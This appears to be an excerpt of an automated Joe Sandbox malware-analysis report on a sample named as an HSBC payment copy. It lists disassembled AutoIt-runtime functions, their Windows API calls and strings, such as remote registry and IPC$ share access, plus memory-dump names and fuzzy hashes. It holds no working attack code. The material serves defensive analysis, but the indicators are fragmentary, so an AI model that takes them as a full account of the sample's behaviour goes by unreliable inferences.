Part of subcall function 00742EFD: __wcsicmp_l.LIBCMT ref: 00742F86

Strings

.icl, xrefs: 007AB82A
.exe, xrefs: 007AB84A
.dll, xrefs: 007AB86D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 7351cc054d8301d72bd156ef0290f44b2dd66b5c7725a86647c5a538ecdb5a07
Instruction ID: 99cef1117b87f92754f52bc78ad3084ee3d246dbe47a81d99f27e1c006944acc
Opcode Fuzzy Hash: 7351cc054d8301d72bd156ef0290f44b2dd66b5c7725a86647c5a538ecdb5a07
Instruction Fuzzy Hash: 8161EFB1500219FAEB14DFA4CC45FBE77A8EF4A711F108216FA15D61C2DB7CA990DBA0

Function 0078DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0078DCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 0078DCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0078DCF8
__wsplitpath.LIBCMT ref: 0078DD56
_wcscat.LIBCMT ref: 0078DD6E
_wcscat.LIBCMT ref: 0078DD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078DD95
SetCurrentDirectoryW.KERNEL32(?), ref: 0078DDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 0078DDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 0078DDFC
_wcscpy.LIBCMT ref: 0078DE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0078DE47

Strings

*.*, xrefs: 0078DE02

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 19fc64340234c6e12d5959e0df57451cc12f4cb5c89be2eafd548d36b6ad3433
Instruction ID: f990a44d64b37af1a3e626707632658932ab7bbe1ff0a4f13a6cef6e0098c110
Opcode Fuzzy Hash: 19fc64340234c6e12d5959e0df57451cc12f4cb5c89be2eafd548d36b6ad3433
Instruction Fuzzy Hash: 65615C725042059FCB20EF60D8489AEB3E8FF89310F04491DF999D7291DB79ED45CB52

Function 00789C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00789C7F

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00789CA0
__swprintf.LIBCMT ref: 00789CF9
__swprintf.LIBCMT ref: 00789D12
_wprintf.LIBCMT ref: 00789DB9
_wprintf.LIBCMT ref: 00789DD7

Strings

Error: , xrefs: 00789D81
Incorrect parameters to object property !, xrefs: 00789D5B
^ ERROR , xrefs: 00789D4E
"%s" (%d) : ==> %s:, xrefs: 00789DD2
"%s" (%d) : ==> %s:%s%s, xrefs: 00789DB4
Line %d (File "%s"):, xrefs: 00789CF3, 00789D0C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 7d281d152416d6a4454b6b4ba63debb05e79bf93d22e97ef350f5eb7a851f58e
Instruction ID: 01604119e69ef808c4e8bc2b331938d5b5f4de55723f98ff2e90136acc257b39
Opcode Fuzzy Hash: 7d281d152416d6a4454b6b4ba63debb05e79bf93d22e97ef350f5eb7a851f58e
Instruction Fuzzy Hash: 5251A271941519EACF18FBE0DE4AEEEB778EF04300F104065F509721A1EB392E48DB65

Function 0078A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00729837: __itow.LIBCMT ref: 00729862
Part of subcall function 00729837: __swprintf.LIBCMT ref: 007298AC

CharLowerBuffW.USER32(?,?), ref: 0078A3CB
GetDriveTypeW.KERNEL32 ref: 0078A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0078A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0078A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0078A4C5

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

Strings

set cd door , xrefs: 0078A466
closed, xrefs: 0078A3DF, 0078A3E8
type cdaudio alias cd wait, xrefs: 0078A443
close, xrefs: 0078A3D1
wait, xrefs: 0078A482
close cd wait, xrefs: 0078A4B0
open , xrefs: 0078A427
open, xrefs: 0078A3F2

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: a41cbb5a2483a8b57811566658ba086ceb21ddafa4c44a18757340877536eed0
Instruction ID: 6b7816f33bb5c61ea197f1e7428c05c5aaf8f8c679bf99e3eaf3a00581175f15
Opcode Fuzzy Hash: a41cbb5a2483a8b57811566658ba086ceb21ddafa4c44a18757340877536eed0
Instruction Fuzzy Hash: ED518C71104315EFC704EF24D99596AB3F4EF88718F14886EF88A57261DB39ED0ACB92

Function 0077F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0075E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0077F8DF
LoadStringW.USER32(00000000,?,0075E029,00000001), ref: 0077F8E8

Part of subcall function 00727DE1: _memmove.LIBCMT ref: 00727E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0075E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0077F90A
LoadStringW.USER32(00000000,?,0075E029,00000001), ref: 0077F90D
__swprintf.LIBCMT ref: 0077F95D
__swprintf.LIBCMT ref: 0077F96E
_wprintf.LIBCMT ref: 0077FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0077FA2E

Strings

Error: , xrefs: 0077F9E5
Line %d (File "%s"):, xrefs: 0077F957
Line %d:, xrefs: 0077F968
^ ERROR, xrefs: 0077F9C3
%s (%d) : ==> %s: %s %s, xrefs: 0077FA12

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 9e15ec3fc52e519b523fbce308ff33c655ec9ed749aaaa6c45c0a5fb6d4ffea3
Instruction ID: bc4deef65f8ccdcad6c015434f79d8c69538e120cf1bb50fae4dac4d41849746
Opcode Fuzzy Hash: 9e15ec3fc52e519b523fbce308ff33c655ec9ed749aaaa6c45c0a5fb6d4ffea3
Instruction Fuzzy Hash: 15413F72904119EACF08FFE0DE8ADEE7778AF15340F104465F509B6091EA396F49CB61

Function 007ABA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007A9207,?,?), ref: 007ABA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA78
CloseHandle.KERNEL32(00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA85
GlobalLock.KERNEL32(00000000), ref: 007ABA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABA9D
GlobalUnlock.KERNEL32(00000000), ref: 007ABAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007A9207,?,?,00000000,?), ref: 007ABABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,007B2CAC,?), ref: 007ABAD7
GlobalFree.KERNEL32(00000000), ref: 007ABAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 007ABB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007ABB36
DeleteObject.GDI32(00000000), ref: 007ABB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007ABB74

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7c1e29eb0d6546526f7bf02749a02c08615e0055e01556d9d4458958f3186005
Instruction ID: 465013ed7bae675e5e74a5040b112dab941d29cc845c875624b20bd9940be291
Opcode Fuzzy Hash: 7c1e29eb0d6546526f7bf02749a02c08615e0055e01556d9d4458958f3186005
Instruction Fuzzy Hash: 8F412775600208EFDB219FA5DC88EAABBB8FBCA711F108168F905D7261D7389D01CB64

Function 0078D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0078DA10
_wcscat.LIBCMT ref: 0078DA28
_wcscat.LIBCMT ref: 0078DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0078DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0078DA63
GetFileAttributesW.KERNEL32(?), ref: 0078DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0078DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0078DAA7

Strings

*.*, xrefs: 0078DAE6

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 7e31e10e0e28ec110c258593d961ae541e49b8acf935b82153b4563e574997e4
Instruction ID: 9daf3756c528316e3d7c384060b286c621b78e744bf66f6f6ddce9beb9575431
Opcode Fuzzy Hash: 7e31e10e0e28ec110c258593d961ae541e49b8acf935b82153b4563e574997e4
Instruction Fuzzy Hash: D08162715442419FCB34EF65C844AAAB7E9FF89310F18882EF889C7291E638ED45CB52

Function 007AC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00722612: GetWindowLongW.USER32(?,000000EB), ref: 00722623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007AC1FC
GetFocus.USER32 ref: 007AC20C
GetDlgCtrlID.USER32(00000000), ref: 007AC217
_memset.LIBCMT ref: 007AC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007AC36D
GetMenuItemCount.USER32(?), ref: 007AC38D
GetMenuItemID.USER32(?,00000000), ref: 007AC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007AC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007AC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007AC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007AC489

Strings

0, xrefs: 007AC33A

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: dad0e0803e0ec283b6f11b2755bcb2645cf6e9499fc1e93f88ddc245ba591e07
Instruction ID: be811b56e01ac00ac9336dcc4bd1de58ad1980d2cef483aeb34da96a32ee7e74
Opcode Fuzzy Hash: dad0e0803e0ec283b6f11b2755bcb2645cf6e9499fc1e93f88ddc245ba591e07
Instruction Fuzzy Hash: 0281A070608341EFDB11CF64C894A6BBBE8FBCA314F004A2EF99597291C738D905CB96

Function 0079731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0079738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0079739B
CreateCompatibleDC.GDI32(?), ref: 007973A7
SelectObject.GDI32(00000000,?), ref: 007973B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00797408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00797444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00797468
SelectObject.GDI32(00000006,?), ref: 00797470
DeleteObject.GDI32(?), ref: 00797479
DeleteDC.GDI32(00000006), ref: 00797480
ReleaseDC.USER32(00000000,?), ref: 0079748B

Strings

(, xrefs: 00797410

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: adc36d5c91b6931ef1235e0e52502661794550ebaf4e65c6da37af4fd9850b5f
Instruction ID: 36e56f9208b27b2ad99aeb6a806b463af0ef9e95d2d253409d4b6e15571d05db
Opcode Fuzzy Hash: adc36d5c91b6931ef1235e0e52502661794550ebaf4e65c6da37af4fd9850b5f
Instruction Fuzzy Hash: 97514875904249EFCB14CFA8DC85EAFBBB9EF89310F14842DF99997211C735A940CB54

Function 00726A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00740957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00726B0C,?,00008000), ref: 00740973

Part of subcall function 00724750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00724743,?,?,007237AE,?), ref: 00724770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00726BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00726CFA

Part of subcall function 0072586D: _wcscpy.LIBCMT ref: 007258A5

Part of subcall function 0074363D: _iswctype.LIBCMT ref: 00743645

Strings

EA06, xrefs: 0075E452
>>>AUTOIT SCRIPT<<<, xrefs: 0075E496
AU3!, xrefs: 00726B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0075E421
Unterminated string, xrefs: 0075E7E4
Error opening the file, xrefs: 0075E43D, 0075E4B8
Bad directive syntax error, xrefs: 0075E79D

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 03ecc8f2a44467b11df2b7a0f302a110faf3f69b4686e7ed40918fb4c1a23d8b
Instruction ID: 37759e4a9139c6e32655dd26e8cc09c7c5553b115d435b00a8c1d6cfd6affb1a
Opcode Fuzzy Hash: 03ecc8f2a44467b11df2b7a0f302a110faf3f69b4686e7ed40918fb4c1a23d8b
Instruction Fuzzy Hash: 5202BE70108350DFCB18EF24D8859AFBBE5EF99354F10481EF489972A1DB78DA49CB52

Function 00782D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00782D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00782DDD
GetMenuItemCount.USER32(007E5890), ref: 00782E66
DeleteMenu.USER32(007E5890,00000005,00000000,000000F5,?,?), ref: 00782EF6
DeleteMenu.USER32(007E5890,00000004,00000000), ref: 00782EFE
DeleteMenu.USER32(007E5890,00000006,00000000), ref: 00782F06
DeleteMenu.USER32(007E5890,00000003,00000000), ref: 00782F0E
GetMenuItemCount.USER32(007E5890), ref: 00782F16
SetMenuItemInfoW.USER32(007E5890,00000004,00000000,00000030), ref: 00782F4C
GetCursorPos.USER32(?), ref: 00782F56
SetForegroundWindow.USER32(00000000), ref: 00782F5F
TrackPopupMenuEx.USER32(007E5890,00000000,?,00000000,00000000,00000000), ref: 00782F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00782F7E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 8de26374f67fcbb644d3b232cee4be8eab03d8bcc0d70dcc7821b7576a38bdd2
Instruction ID: 3ce425b9daeea2d3090d7809d3f4911d1409c5b6fe820ede69e8d4580f1785d5
Opcode Fuzzy Hash: 8de26374f67fcbb644d3b232cee4be8eab03d8bcc0d70dcc7821b7576a38bdd2
Instruction Fuzzy Hash: 6D714C70780205BFEB21AF54DC89FAABF64FF05315F104216F615AA1E2C7B95C21C754

Function 007988AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007988D7
CoInitialize.OLE32(00000000), ref: 00798904
CoUninitialize.OLE32 ref: 0079890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00798A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00798B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007B2C0C), ref: 00798B6F
CoGetObject.OLE32(?,00000000,007B2C0C,?), ref: 00798B92
SetErrorMode.KERNEL32(00000000), ref: 00798BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00798C25
VariantClear.OLEAUT32(?), ref: 00798C35

Strings

,,{, xrefs: 007988C1

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID: ,,{
API String ID: 2395222682-821077388
Opcode ID: ea298fb912ff99d564f6e7c0c7edb7d2d7ac391288668a31145b6c335d5f55e3
Instruction ID: 31c1f23d8f2d7d3eb8acc21e59240ff74c8fe9d77b610ae1a937d81227c7ae63
Opcode Fuzzy Hash: ea298fb912ff99d564f6e7c0c7edb7d2d7ac391288668a31145b6c335d5f55e3
Instruction Fuzzy Hash: 42C135B1208305AFCB40DF64D88492BB7E9FF8A348F04495DF98A9B251DB79ED05CB52

Function 007777DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

_memset.LIBCMT ref: 0077786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007778A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007778BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007778D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00777902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0077792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00777935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0077793A

Strings

SOFTWARE\Classes\, xrefs: 0077780C
\CLSID, xrefs: 00777822
\IPC$, xrefs: 00777882

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: 2fa8f7361829994dfcf182d5188e6ec496ece1d6d56d3e1919d3ad188723c302
Instruction ID: f94a2f4523dc70a177e41e2a1f753981d04a73d3e4341b469cab579abc5df801
Opcode Fuzzy Hash: 2fa8f7361829994dfcf182d5188e6ec496ece1d6d56d3e1919d3ad188723c302
Instruction Fuzzy Hash: DE41E972C14629EACF19EFA4EC49DEEB778FF04350F408469E905A3161EA385D45CB90

Function 007A0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079FDAD,?,?), ref: 007A0E31

Strings

HKCU, xrefs: 007A0F21
HKEY_USERS, xrefs: 007A0F32
HKU, xrefs: 007A0F43
HKCC, xrefs: 007A0EFF
